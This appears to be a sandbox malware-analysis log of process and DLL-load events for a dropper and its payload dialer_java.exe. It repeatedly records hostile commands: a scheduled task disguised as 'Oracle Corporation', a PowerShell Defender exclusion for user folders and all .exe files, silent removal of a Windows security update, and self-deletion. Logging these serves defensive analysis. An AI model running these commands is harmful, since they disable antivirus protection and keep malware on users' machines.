Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: unknown unknownJump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\choice.exeSection loaded: version.dllJump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
